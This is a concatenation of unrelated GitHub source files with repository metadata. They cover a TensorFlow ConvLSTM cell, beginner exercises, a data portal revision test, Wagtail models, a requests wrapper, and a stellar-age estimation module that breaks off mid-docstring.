\"\"\"\n super(ConvLSTMCell, self).__init__(_reuse=reuse)\n\n if conv_ndims != len(input_shape) - 1:\n raise ValueError(\"Invalid input_shape {} for conv_ndims={}.\".format(\n input_shape, conv_ndims))\n\n self._conv_ndims = conv_ndims\n self._input_shape = input_shape\n self._output_channels = output_channels\n self._kernel_shape = kernel_shape\n self._use_bias = use_bias\n self._forget_bias = forget_bias\n self._skip_connection = skip_connection\n self._reuse = reuse\n\n self._total_output_channels = output_channels\n if self._skip_connection:\n self._total_output_channels += self._input_shape[-1]\n\n state_size = tensor_shape.TensorShape(\n self._input_shape[:-1] + [self._output_channels])\n self._state_size = rnn_cell_impl.LSTMStateTuple(state_size, state_size)\n self._output_size = tensor_shape.TensorShape(\n self._input_shape[:-1] + [self._total_output_channels])\n\n @property\n def output_size(self):\n return self._output_size\n\n @property\n def state_size(self):\n return self._state_size\n\n def call(self, inputs, state, scope=None):\n with vs.variable_scope(scope, reuse=self._reuse):\n cell, hidden = state\n new_hidden = _conv([inputs, hidden], self._kernel_shape,\n 4 * self._output_channels, self._use_bias)\n gates = array_ops.split(\n value=new_hidden, num_or_size_splits=4, axis=self._conv_ndims + 1)\n input_gate, new_input, forget_gate, output_gate = gates\n new_cell = math_ops.sigmoid(forget_gate + self._forget_bias) * cell\n new_cell += math_ops.sigmoid(input_gate) * math_ops.tanh(new_input)\n output = math_ops.tanh(new_cell) * math_ops.sigmoid(output_gate)\n\n if self._skip_connection:\n output = array_ops.concat([output, inputs], axis=-1)\n new_state = rnn_cell_impl.LSTMStateTuple(new_cell, output)\n return output, new_state\n\n\nclass Conv1DLSTMCell(ConvLSTMCell):\n \"\"\"1D Convolutional LSTM recurrent network cell.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n\n def __init__(self, name=\"conv_1d_lstm_cell\", **kwargs):\n \"\"\"Construct Conv1DLSTM. See `ConvLSTMCell` for more details.\"\"\"\n super(Conv1DLSTMCell, self).__init__(conv_ndims=1, name=name, **kwargs)\n\n\nclass Conv2DLSTMCell(ConvLSTMCell):\n \"\"\"2D Convolutional LSTM recurrent network cell.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n\n def __init__(self, name=\"conv_2d_lstm_cell\", **kwargs):\n \"\"\"Construct Conv2DLSTM. See `ConvLSTMCell` for more details.\"\"\"\n super(Conv2DLSTMCell, self).__init__(conv_ndims=2, name=name, **kwargs)\n\n\nclass Conv3DLSTMCell(ConvLSTMCell):\n \"\"\"3D Convolutional LSTM recurrent network cell.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n\n def __init__(self, name=\"conv_3d_lstm_cell\", **kwargs):\n \"\"\"Construct Conv3DLSTM. See `ConvLSTMCell` for more details.\"\"\"\n super(Conv3DLSTMCell, self).__init__(conv_ndims=3, name=name, **kwargs)\n\n\ndef _conv(args, filter_size, num_features, bias, bias_start=0.0):\n \"\"\"Convolution.\n\n Args:\n args: a Tensor or a list of Tensors of dimension 3D, 4D or 5D,\n batch x n, Tensors.\n filter_size: int tuple of filter height and width.\n num_features: int, number of features.\n bias: Whether to use biases in the convolution layer.\n bias_start: starting value to initialize the bias; 0 by default.\n\n Returns:\n A 3D, 4D, or 5D Tensor with shape [batch ... num_features]\n\n Raises:\n ValueError: if some of the arguments has unspecified or wrong shape.\n \"\"\"\n\n # Calculate the total size of arguments on dimension 1.\n total_arg_size_depth = 0\n shapes = [a.get_shape().as_list() for a in args]\n shape_length = len(shapes[0])\n for shape in shapes:\n if len(shape) not in [3, 4, 5]:\n raise ValueError(\"Conv Linear expects 3D, 4D \"\n \"or 5D arguments: %s\" % str(shapes))\n if len(shape) != len(shapes[0]):\n raise ValueError(\"Conv Linear expects all args \"\n \"to be of same Dimension: %s\" % str(shapes))\n else:\n total_arg_size_depth += shape[-1]\n dtype = [a.dtype for a in args][0]\n\n # determine correct conv operation\n if shape_length == 3:\n conv_op = nn_ops.conv1d\n strides = 1\n elif shape_length == 4:\n conv_op = nn_ops.conv2d\n strides = shape_length * [1]\n elif shape_length == 5:\n conv_op = nn_ops.conv3d\n strides = shape_length * [1]\n\n # Now the computation.\n kernel = vs.get_variable(\n \"kernel\", filter_size + [total_arg_size_depth, num_features], dtype=dtype)\n if len(args) == 1:\n res = conv_op(args[0], kernel, strides, padding=\"SAME\")\n else:\n res = conv_op(\n array_ops.concat(axis=shape_length - 1, values=args),\n kernel,\n strides,\n padding=\"SAME\")\n if not bias:\n return res\n bias_term = vs.get_variable(\n \"biases\", [num_features],\n dtype=dtype,\n initializer=init_ops.constant_initializer(bias_start, dtype=dtype))\n return res + bias_term\n","repo_name":"XuzheZ/DPLN-EMSeg","sub_path":"DPLN/cell/rnn_cell.py","file_name":"rnn_cell.py","file_ext":"py","file_size_in_byte":9218,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"17576764656","text":"# 학교에서 축구대회를 열기로 했다. 본교 학생 수가 많아서 되도록 큰 운동장을 필요로 한다.\n# 학교 근처에 축구를 할 수 있는 운동장이 3개가 있는데 각 운동장의 가로와 세로의 길이를 홈페이지를 통해서 알 수 있었다.\n# 우리는 3개의 운동장 중 가장 큰 운동장을 빌리기로 했다.\n# 이 3개의 운동장 중 가장 넓은 운동장의 넓이를 구하는 프로그램을 작성하시오.\n\nlist1 = []\n\nfor i in range(3):\n a , b = input().split()\n a = int(a)\n b = int(b)\n c = a * b\n list1.append(c)\n# print(list1)\na = list1[0]\nb = list1[1]\nc = list1[2]\n\nif a > b > c:\n print(a)\nelif a > c > b:\n print(a)\nelif b > a > c:\n print(b)\nelif b > c > a:\n print(b)\nelif c > a > b:\n print(c)\nelif c > b > a:\n print(c)\n\n\n\n\n","repo_name":"polkmn222/codeup-python","sub_path":"1289.py","file_name":"1289.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42680788958","text":"import json\nimport os\nimport unittest\nfrom urllib.parse import quote\n\nimport requests\nfrom tenacity import retry, stop_after_attempt, wait_fixed\n\nfrom tests.functional.backend.common import BaseFunctionalTestCase\n\n\nclass TestRevisions(BaseFunctionalTestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n\n def create_collection(self, headers):\n data = {\n \"contact_email\": \"lisbon@gmail.com\",\n \"contact_name\": \"Madrid Sparkle\",\n \"curator_name\": \"John Smith\",\n \"description\": \"Well here are some words\",\n \"links\": [{\"link_name\": \"a link to somewhere\", \"link_type\": \"PROTOCOL\", \"link_url\": \"http://protocol.com\"}],\n \"name\": \"my2collection\",\n }\n\n res = self.session.post(f\"{self.api}/dp/v1/collections\", data=json.dumps(data), headers=headers)\n res.raise_for_status()\n data = json.loads(res.content)\n collection_id = data[\"collection_id\"]\n\n # Doesn't work since the collection is published. See issue #1375\n # Should work now via cxg-admin role thru Curation API\n curation_api_headers = {\"Authorization\": f\"Bearer {self.curation_api_access_token}\"}\n self.addCleanup(\n self.session.delete,\n f\"{self.api}/curation/v1/collections/{collection_id}?delete_published=true\",\n headers=curation_api_headers,\n )\n self.assertStatusCode(requests.codes.created, res)\n self.assertIn(\"collection_id\", data)\n return collection_id\n\n def create_explorer_url(self, dataset_id):\n return f\"https://cellxgene.{self.deployment_stage}.single-cell.czi.technology/e/{dataset_id}.cxg/\"\n\n # TODO: Remove rdev from skip list. Rdev Explorer is required for this test to pass.\n @unittest.skipIf(os.environ[\"DEPLOYMENT_STAGE\"] in [\"prod\", \"rdev\"], \"Do not make test collections public in prod\")\n def test_revision_flow(self):\n\n headers = {\"Cookie\": f\"cxguser={self.curator_cookie}\", \"Content-Type\": \"application/json\"}\n\n collection_id = self.create_collection(headers)\n\n dataset_1_dropbox_url = self.test_dataset_uri\n dataset_2_dropbox_url = self.test_dataset_uri\n\n # Uploads a dataset\n self.upload_and_wait(collection_id, dataset_1_dropbox_url)\n\n # make collection public\n with self.subTest(\"Test make collection public\"):\n body = {\"data_submission_policy_version\": \"1.0\"}\n res = self.session.post(\n f\"{self.api}/dp/v1/collections/{collection_id}/publish\", headers=headers, data=json.dumps(body)\n )\n res.raise_for_status()\n self.assertStatusCode(requests.codes.accepted, res)\n\n # get canonical collection id, post-publish\n res = self.session.get(f\"{self.api}/dp/v1/collections/{collection_id}\", headers=headers)\n data = json.loads(res.content)\n canonical_collection_id = data[\"id\"]\n\n dataset_response = self.session.get(f\"{self.api}/dp/v1/collections/{canonical_collection_id}\").json()[\n \"datasets\"\n ][0]\n dataset_id = dataset_response[\"id\"]\n explorer_url = dataset_response[\"dataset_deployments\"][0][\"url\"]\n\n meta_payload_before_revision_res = self.session.get(f\"{self.api}/dp/v1/datasets/meta?url={explorer_url}\")\n meta_payload_before_revision_res.raise_for_status()\n meta_payload_before_revision = meta_payload_before_revision_res.json()\n\n # Endpoint is eventually consistent\n schema_before_revision = self.get_schema_with_retries(dataset_id).json()\n\n # Start a revision\n res = self.session.post(f\"{self.api}/dp/v1/collections/{canonical_collection_id}\", headers=headers)\n self.assertStatusCode(201, res)\n data = json.loads(res.content)\n revision_id = data[\"id\"]\n\n with self.subTest(\"Test updating a dataset in a revision does not effect the published dataset\"):\n private_dataset_id = res.json()[\"datasets\"][0][\"id\"]\n\n meta_payload_res = self.session.get(f\"{self.api}/dp/v1/datasets/meta?url={explorer_url}\")\n meta_payload_res.raise_for_status()\n meta_payload = meta_payload_res.json()\n\n self.assertDictEqual(meta_payload_before_revision, meta_payload)\n\n # Upload a new dataset\n self.upload_and_wait(\n revision_id,\n dataset_2_dropbox_url,\n existing_dataset_id=private_dataset_id,\n )\n\n # Check that the published dataset is still the same\n meta_payload_after_revision = self.session.get(f\"{self.api}/dp/v1/datasets/meta?url={explorer_url}\").json()\n self.assertDictEqual(meta_payload_before_revision, meta_payload_after_revision)\n schema_after_revision = self.get_schema_with_retries(dataset_id).json()\n self.assertDictEqual(schema_before_revision, schema_after_revision)\n\n with self.subTest(\"Publishing a revised dataset replaces the original dataset\"):\n # Publish the revision\n body = {\"data_submission_policy_version\": \"1.0\"}\n res = self.session.post(\n f\"{self.api}/dp/v1/collections/{revision_id}/publish\", headers=headers, data=json.dumps(body)\n )\n res.raise_for_status()\n self.assertStatusCode(requests.codes.accepted, res)\n\n dataset_meta_payload = self.session.get(f\"{self.api}/dp/v1/datasets/meta?url={explorer_url}\").json()\n self.assertTrue(\n dataset_meta_payload[\"s3_uri\"].startswith(f\"s3://hosted-cellxgene-{os.environ['DEPLOYMENT_STAGE']}/\")\n )\n self.assertTrue(dataset_meta_payload[\"s3_uri\"].endswith(\".cxg/\"))\n self.assertIn(\n dataset_meta_payload[\"dataset_id\"],\n dataset_meta_payload[\"s3_uri\"],\n \"The id of the S3_URI should be the revised dataset id.\",\n )\n\n # TODO: add `And the explorer url redirects appropriately`\n\n # Start a new revision\n res = self.session.post(f\"{self.api}/dp/v1/collections/{canonical_collection_id}\", headers=headers)\n self.assertStatusCode(201, res)\n revision_id = res.json()[\"id\"]\n\n # Get datasets for the collection (before uploading)\n public_datasets_before = self.session.get(f\"{self.api}/dp/v1/collections/{canonical_collection_id}\").json()[\n \"datasets\"\n ]\n\n # Upload a new dataset\n another_dataset_id = self.upload_and_wait(revision_id, dataset_1_dropbox_url)\n\n with self.subTest(\"Adding a dataset to a revision does not impact public datasets in that collection\"):\n # Get datasets for the collection (after uploading)\n public_datasets_after = self.session.get(f\"{self.api}/dp/v1/collections/{canonical_collection_id}\").json()[\n \"datasets\"\n ]\n self.assertCountEqual(public_datasets_before, public_datasets_after)\n\n # Publish the revision\n body = {\"data_submission_policy_version\": \"1.0\"}\n res = self.session.post(\n f\"{self.api}/dp/v1/collections/{revision_id}/publish\", headers=headers, data=json.dumps(body)\n )\n res.raise_for_status()\n self.assertStatusCode(requests.codes.accepted, res)\n\n with self.subTest(\n \"Publishing a revision that contains a new dataset updates \"\n \"the collection page for the data portal (with the new dataset)\"\n ):\n # Check if the last updated dataset_id is among the public datasets\n public_datasets = self.session.get(f\"{self.api}/dp/v1/collections/{canonical_collection_id}\").json()[\n \"datasets\"\n ]\n self.assertEqual(len(public_datasets), 2)\n ids = [dataset[\"id\"] for dataset in public_datasets]\n self.assertIn(another_dataset_id, ids)\n\n # Start a revision\n res = self.session.post(f\"{self.api}/dp/v1/collections/{canonical_collection_id}\", headers=headers)\n self.assertStatusCode(201, res)\n revision_id = res.json()[\"id\"]\n\n # This only works if you pick the non replaced dataset.\n dataset_to_delete = res.json()[\"datasets\"][1]\n revision_deleted_dataset_id = dataset_to_delete[\"id\"]\n published_explorer_url = self.create_explorer_url(revision_deleted_dataset_id)\n\n # Delete (tombstone) a dataset (using admin privileges) within the revision\n revision_datasets = self.session.get(f\"{self.api}/curation/v1/collections/{revision_id}\").json()[\"datasets\"]\n dataset_id_to_delete = None\n for dataset in revision_datasets:\n if dataset[\"dataset_version_id\"] == revision_deleted_dataset_id:\n dataset_id_to_delete = dataset[\"dataset_id\"]\n\n curation_api_headers = {\"Authorization\": f\"Bearer {self.curation_api_access_token}\"}\n res = self.session.delete(\n f\"{self.api}/curation/v1/collections/{revision_id}/datasets/{dataset_id_to_delete}?delete_published=true\",\n headers=curation_api_headers,\n )\n self.assertStatusCode(202, res)\n\n with self.subTest(\"Deleting a dataset does not effect the published dataset\"):\n # Check if the dataset is still available\n res = self.session.get(f\"{self.api}/dp/v1/datasets/meta?url={published_explorer_url}\")\n self.assertStatusCode(200, res)\n\n # Endpoint is eventually consistent\n res = self.get_schema_with_retries(revision_deleted_dataset_id)\n self.assertStatusCode(200, res)\n\n with self.subTest(\"Publishing a revision that deletes a dataset removes it from the data portal\"):\n # Publish the revision\n body = {\"data_submission_policy_version\": \"1.0\"}\n res = self.session.post(\n f\"{self.api}/dp/v1/collections/{revision_id}/publish\", headers=headers, data=json.dumps(body)\n )\n res.raise_for_status()\n self.assertStatusCode(requests.codes.accepted, res)\n\n # Check that the dataset doesn't exist anymore\n res = self.session.get(f\"{self.api}/dp/v1/collections/{collection_id}\", headers=headers)\n res.raise_for_status()\n datasets = [dataset[\"id\"] for dataset in res.json()[\"datasets\"]]\n self.assertEqual(1, len(datasets))\n self.assertNotIn(revision_deleted_dataset_id, datasets)\n\n def get_schema_with_retries(self, dataset_id, desired_http_status_code=requests.codes.ok):\n @retry(wait=wait_fixed(1), stop=stop_after_attempt(50))\n def get_s3_uri():\n s3_uri_res = self.session.get(\n f\"{self.api}/cellxgene/e/{dataset_id}.cxg/api/v0.3/s3_uri\", allow_redirects=False\n )\n assert s3_uri_res.status_code == desired_http_status_code\n return s3_uri_res\n\n @retry(wait=wait_fixed(1), stop=stop_after_attempt(50))\n def get_schema(s3_uri_response_object):\n # parse s3_uri_response_object content\n s3_path = s3_uri_response_object.content.decode(\"utf-8\").strip().strip('\"')\n # s3_uri endpoints use double-encoded s3 uri path parameters\n s3_path_url = quote(quote(s3_path, safe=\"\"))\n schema_res = self.session.get(\n f\"{self.api}/cellxgene/s3_uri/{s3_path_url}/api/v0.3/schema\", allow_redirects=False\n )\n assert schema_res.status_code == requests.codes.ok\n return schema_res\n\n s3_uri_response = get_s3_uri()\n return get_schema(s3_uri_response)\n","repo_name":"chanzuckerberg/single-cell-data-portal","sub_path":"tests/functional/backend/corpora/test_revisions.py","file_name":"test_revisions.py","file_ext":"py","file_size_in_byte":11621,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"35"} +{"seq_id":"75175458660","text":"from django.db import models\n\nfrom wagtail.contrib.settings.models import BaseSetting, register_setting\nfrom wagtail.images.models import Image\n\nfrom wagtail.core.models import Page\nfrom modelcluster.fields import ParentalKey\nfrom wagtail.admin.edit_handlers import (\n FieldPanel, FieldRowPanel,\n InlinePanel, MultiFieldPanel\n)\nfrom wagtail.contrib.forms.edit_handlers import FormSubmissionsPanel\nfrom wagtail.images.edit_handlers import ImageChooserPanel\n\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.contrib.forms.models import AbstractEmailForm, AbstractFormField\n\n\n@register_setting\nclass SiteSettings(BaseSetting):\n logo = models.OneToOneField(Image, null=True, blank=True,\n on_delete=models.SET_NULL, related_name='+', verbose_name='Business logo')\n panels = [\n ImageChooserPanel('logo'),\n ]\n\n\nclass HomePage(Page):\n body = RichTextField(blank=True)\n\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+',\n )\n\n content_panels = Page.content_panels + [\n ImageChooserPanel('image'),\n FieldPanel('body', classname=\"full\"),\n ]\n\n\nclass SubscribeField(AbstractFormField):\n page = ParentalKey('SubscribePage', on_delete=models.CASCADE,\n related_name='form_fields')\n\n\nclass SubscribePage(AbstractEmailForm):\n intro = RichTextField(blank=True)\n thank_you_text = RichTextField(blank=True)\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+',\n )\n\n content_panels = AbstractEmailForm.content_panels + [\n FormSubmissionsPanel(),\n ImageChooserPanel('image'),\n FieldPanel('intro', classname=\"full\"),\n InlinePanel('form_fields', label=\"Subscribe fields\"),\n FieldPanel('thank_you_text', classname=\"full\"),\n MultiFieldPanel([\n FieldRowPanel([\n FieldPanel('from_address', classname=\"col6\"),\n FieldPanel('to_address', classname=\"col6\"),\n ]),\n FieldPanel('subject'),\n ], \"Email\"),\n ]\n","repo_name":"firesidewing/HahnEngineering","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34248652974","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n# @Time : 2021/2/28 11:37\n# @Author : liujianxiao\n# @Version:V 0.1\n# @File : base.py\n# @desc : 父类\nimport requests\n\n\nclass Base():\n def __init__(self):\n self.request_session = requests.session()\n url = f\"https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=ww82b74853d3f08580&corpsecret=ws13zUNeO5HbzWdZFHzd10tN6odXac_1iDyVQ2tTyMM\"\n result = requests.get(url)\n token = result.json()[\"access_token\"]\n print(\"token:\",token)\n self.request_session.params ={'access_token':token}\n\n def send(self,*args,**kwargs):\n return self.request_session.request(*args,**kwargs)\n","repo_name":"liujianxiao27/Homework","sub_path":"requestTwo/myFrame/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"971959550","text":"'''\r\nLab16\r\nName: 977. Squares of a Sorted Array\r\nhttps://leetcode.com/problems/squares-of-a-sorted-array/\r\n'''\r\n\r\n\r\nclass Solution:\r\n def sortedSquares(self, nums: List[int]) -> List[int]:\r\n\r\n L, R, res = 0, len(nums) - 1, []\r\n while L <= R:\r\n if abs(nums[L]) >= abs(nums[R]):\r\n res.append(nums[L] ** 2)\r\n L += 1\r\n else:\r\n res.append(nums[R] ** 2)\r\n R -= 1\r\n return res[::-1]\r\n","repo_name":"Flanker35B/leetcode","sub_path":"lab2/lab16_Squares of a Sorted Array.py","file_name":"lab16_Squares of a Sorted Array.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"32672062918","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 24 14:19:27 2018\n\n@author: christian\n\"\"\"\n\nimport h5py\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats import norm\nfrom scipy.optimize import newton\nfrom scipy.linalg import block_diag\n\n\ndef smooth_gfunc2d(g):\n '''\n Smooth a 2D G function.\n\n Parameters\n ----------\n g : array\n 2D G function.\n\n Returns\n -------\n g2 : array\n Smoothed 2D G function.\n '''\n\n kernel = np.array([0.25, 0.5, 0.25])\n func = lambda x: np.convolve(x, kernel, mode='same')\n g1 = np.apply_along_axis(func, 0, g)\n g2 = np.apply_along_axis(func, 1, g1)\n\n return g2\n\n\ndef norm_gfunc(g, method='maxone'):\n '''\n Normalise G function.\n\n Parameters\n ----------\n g : array\n 1D/2D G function.\n\n method : str, optional\n Normalisation method.\n Default is 'maxone' which scales the max value to one.\n\n Returns\n -------\n gnorm : array\n Normalised G function.\n '''\n\n gmax = np.amax(g)\n if method == 'maxone':\n if gmax == 0:\n gnorm = np.ones_like(g)\n else:\n gnorm = g / np.amax(g)\n elif method == 'sumone':\n if gmax == 0:\n gnorm = np.ones_like(g) / np.size(g)\n else:\n gnorm = g / np.sum(g)\n# elif method == 'some other method':\n# gnorm = ...\n else:\n raise ValueError('Unknown normalization method')\n\n return gnorm\n\n\ndef gfunc_age(g, norm=True, norm_method='maxone'):\n '''\n Get the 1D age G function from the 2D G function.\n\n Parameters\n ----------\n g : array\n 1D/2D G function.\n\n norm : bool, optional\n Normalise the G function before returning.\n Default value is True.\n\n norm_method : str, optional\n Normalisation method to use if `norm=True`.\n Default is 'maxone'.\n\n Returns\n -------\n g_age : array\n 1D age G function.\n '''\n\n g_age = np.sum(g, axis=1)\n if norm:\n g_age = norm_gfunc(g_age, norm_method)\n\n return g_age\n\n\ndef gfunc_age_quantile(g_age, age_grid, q):\n '''\n The the q'th quantile of the 1D age G function\n interpolated onto the age grid.\n (q = 0.5 gives the median age)\n\n Parameters\n ----------\n g_age : array\n 1D age G function.\n\n age_grid: array\n The age values on which `g_age` is defined.\n Must be same length as g_age.\n\n q : float\n Quantile to compute, which must be between 0 and 1.\n\n Returns\n -------\n age_q : float\n Age quantile.\n '''\n\n g_age_cumsum = np.cumsum(g_age)\n g_age_cumsum /= g_age_cumsum[-1]\n age_q_ind = np.argmin((np.abs(g_age_cumsum-q)))\n age_q = age_grid[age_q_ind]\n\n return age_q\n\n\ndef gfunc_age_mode(g_age, age_grid, use_median=False):\n '''\n Get the mode or mean of a 1D age G function.\n\n Parameters\n ----------\n g_age : array\n 1D age G function.\n\n age_grid: array\n The age values on which `g_age` is defined.\n Must be same length as g_age.\n\n use_median : bool, optional\n Use median instead of mode if True.\n Default is False.\n\n Returns\n -------\n age_mode : float\n Mode (or mean) of the 1D age G function.\n '''\n\n if use_median:\n age_mode = gfunc_age_quantile(g_age, age_grid, 0.5)\n else:\n ind = np.argmax(g_age)\n age_mode = age_grid[ind]\n\n return age_mode\n\n\ndef conf_glim(conf_level):\n '''\n Get the limiting value of a 1D age G function corresponding\n to a certain age confidence level.\n This is calculated assuming that the G function can be approximated\n by a Gaussian.\n\n Parameters\n ----------\n conf_level : float\n Confidence level as a fraction (between 0 and 1).\n\n Returns\n -------\n glim : float\n Limit on the G function setting the confidence limits.\n '''\n\n assert conf_level > 0 and conf_level < 1\n\n zero_func = lambda x: 2*norm.cdf(np.sqrt(-2*np.log(x))) - 1 - conf_level\n glim = newton(zero_func, 0.6)\n\n return glim\n\n\ndef gfunc_age_conf(g_age, age_grid, conf_level=0.68, use_median=False):\n '''\n Get the confidence interval of the age from a 1D G function.\n\n Parameters\n ----------\n g_age : array\n 1D age G function.\n\n age_grid : array\n The age values on which `g_age` is defined.\n Must be same length as g_age.\n\n conf_level : float\n Confidence level as a fraction (between 0 and 1).\n Default value is 0.68 corresponding to 1 sigma for a Gaussian.\n\n Returns\n -------\n age_conf : tuple\n Lower and upper limit on the confidence interval of the age.\n None is returned if no limit exists (the G function does not fall\n below the critical value given by the confidence level before\n hitting the edge of the age_grid).\n '''\n\n if use_median:\n age_low = gfunc_age_quantile(g_age, age_grid, 0.5-conf_level/2)\n age_high = gfunc_age_quantile(g_age, age_grid, 0.5+conf_level/2)\n else:\n glim = conf_glim(conf_level)\n ages_lim = age_grid[g_age > glim]\n age_low, age_high = ages_lim[0], ages_lim[-1]\n\n if age_low == age_grid[0]:\n age_low = None\n if age_high == age_grid[-1]:\n age_high = None\n age_conf = (age_low, age_high)\n\n return age_conf\n\n \ndef age_mode_and_conf(g_age, age_grid, conf_levels=[0.68, 0.90],\n use_median=False):\n '''\n Get the mode (or mean) and confidence interval for a 1D age G function\n with a number of confidence intervals.\n\n Parameters\n ----------\n g_age : array\n 1D age G function.\n\n age_grid : array\n The age values on which `g_age` is defined.\n Must be same length as g_age.\n\n conf_levels : list of float\n Confidence levels as fractions (between 0 and 1).\n Default value is [0.68, 0.90].\n\n use_median : bool, optional\n Use median instead of mode if True.\n Default is False.\n\n Returns\n -------\n age_arr : array\n List of length 1+2*len(`conf_levels`). The middle entry is\n the age mode (or mean), and the surrounding values are the\n confidence interval.\n For example with conf_levels=[0.68, 0.90] it returns the list\n [5%, 16%, mode, 84%, 95%].\n '''\n\n n = len(conf_levels)\n age_arr = np.zeros(1+2*n)\n\n age_arr[n] = gfunc_age_mode(g_age, age_grid, use_median)\n for i in range(1, n+1):\n try:\n age_arr[n-i:n+i+1:2*i] = gfunc_age_conf(g_age, age_grid,\n conf_level=conf_levels[i-1],\n use_median=use_median)\n except:\n age_arr[:] = None\n break\n\n return age_arr\n\n\ndef print_age_stats(output_h5, filename, smooth=False, use_median=False):\n '''\n Function for printing ages and confidence intervals to a text file\n based on an output hdf5 file (containing the 2D G functions).\n The age statistics which are printed are the mode of the G function as\n well as the 68 and 90% confidence intervals (this can be changed in\n the source code).\n\n Parameters\n ----------\n output_h5 : str\n Path to the output hdf5 file.\n\n filename : str\n Name of the text file with the age output.\n\n smooth : bool\n If True, smooth the G functions before calculating the ages and\n confidence intervals.\n Note: This only applies to 2D G functions, if the G functions in\n output_h5 are 1D, nothing happens.\n Default value is False.\n\n use_median : bool, optional\n Use median of G function instead of mode if True.\n Default is False.\n '''\n\n with h5py.File(output_h5, 'r') as out:\n ages = out['grid/tau'][:]\n gf_group = out['gfuncs']\n if len(gf_group) == 1:\n star_id = np.array([star for star in gf_group])\n else:\n star_id = np.array(gf_group)\n try:\n star_id_sort = np.argsort([int(x) for x in star_id])\n star_id = star_id[star_id_sort]\n except ValueError:\n print('star_id not sorted in '+filename)\n\n n_star = len(star_id)\n age_arr = np.zeros((n_star, 5))\n for i, star in enumerate(star_id):\n g = gf_group[star][:]\n gdim = g.ndim\n if gdim == 2:\n if smooth:\n g = smooth_gfunc2d(g)\n g_age = gfunc_age(g)\n else:\n g_age = g\n g_age = norm_gfunc(g_age)\n age_arr[i] = age_mode_and_conf(g_age, ages, use_median=use_median)\n\n # Pad identifier strings (for prettier output)\n id_len = max((10, max([len(x) for x in star_id])))\n star_id_pad = [x.ljust(id_len) for x in star_id]\n\n # Combine identifiers and data in DataFrame and write to txt\n pd_arr = pd.DataFrame(age_arr, index=star_id_pad)\n astr = 'aMedian' if use_median else 'aMode'\n pd_arr.to_csv(filename, sep='\\t', index_label='#IDnumber',\n header=['a5', 'a16', astr, 'a84', 'a95'],\n float_format='%2.2f', na_rep='nan')\n\n\ndef estimate_samd(gfunc_files, case='1D', betas=None, alpha=0, stars=None,\n grid_slice=None, grid_thin=None, max_iter=10, min_tol=1.e-20):\n '''\n Function for estimating the sample age metallicity distribution (samd) OR\n simply the sample age distribution (sad).\n\n This uses a Newton-Raphson minimisation to find the function phi which\n maximises the likelihood L(phi) = sum(L_i(phi)), where\n L_i(phi) = int(G_i(theta)*phi(theta)) ,\n and G_i are the G functions and theta is either the age (in the 1D case)\n or both the age and metallicity (in the 2D) case.\n\n Parameters\n ----------\n gfunc_files : list\n List of paths to the output hdf5 files containing the 2D G functions.\n If more than one, the output in the different files MUST be defined on\n the same age/metallicity grids.\n\n case : str, optional\n Determines whether the 2D (samd) or 1D (sad) is calculated.\n '2D' for samd and '1D' for sad. Default is '1D'.\n\n betas : tuple, optional\n Beta is a regularization parameter which regulates how strongly the\n solution favors a flat (constant) function (0 is most strict, higher\n numbers are less strict).\n betas should be a tuple containing the three floats beta, dbeta, and\n beta_max. beta is the initial value, dbeta is the step, and beta_max is\n the maximum value which, if hit, stops the computation.\n beta (the initial value) should be close to 0 and dbeta not too large\n to allow a gentle convergence towards a sensible solution.\n Default is None in which case the values (0.01, 0.01, 1.00) are used.\n\n alpha : int, optional\n Value of the smoothing parameter. Higher values will favor solutions\n with smaller point-to-point variations (first derivatives).\n Not implemented proberly in the '2D' case.\n Default value is 0.\n\n stars : list of str, optional\n List of star identifiers (as used in the gfunc_files) to be included in\n the calculation.\n Default is None in which case all stars are included.\n\n grid_slice : tuple of ints, optional\n Grid slice indices. If specified, it must be a tuple of four integers,\n and only the ages from grid_slice[0] to grid_slice[1] and the\n metallicities from grid_slice[2] to grid_slice[3] are considered.\n This increases performance by decresaing the size of the problem.\n Default value is None in which case all grid points are considered.\n Note that if gfunctions are saved as 1D, only the first two integers\n are used (it is too late to thin in metallicity).\n\n grid_thin : tuple of ints, optional\n Thinning factor. If specified, it must be a tuple of two integers, and\n only every `grid_thin[0]`th age and every `grid_thin[1]`th metallicity\n grid point is considered. This increases performance by decreasing the\n size of the problem.\n This thinning is performed after slicing with grid_slice.\n Default is None in which case all grid points (in the grid_slice\n selection) are considered.\n\n max_iter : int, optional\n Maximum number of Newton-Raphson iterations per beta.\n Default value is 10\n\n min_tol : float, optional\n Minimum value that the samd/sad is allowed to reach.\n Default value is 1e-20.\n\n Returns\n -------\n samd : list\n List of samd/sad with one entry for each value of beta.\n\n Q : list\n List of same length as `samd`. Each entry is a list giving the values of\n beta, the negative log-likelihood of the solution, and its entropy.\n\n tau_grid : array\n Age grid on which the input G functions were defined (taken from on of\n the `gfunc_files`).\n\n feh_grid : array\n Metallicity grid on which the input G functions were defined (taken\n from on of the `gfunc_files`).\n '''\n # Load data\n g2d = []\n tau_grid, feh_grid = None, None\n for i, gfunc_file in enumerate(gfunc_files):\n # Allow for stars to be a list of lists (one for each 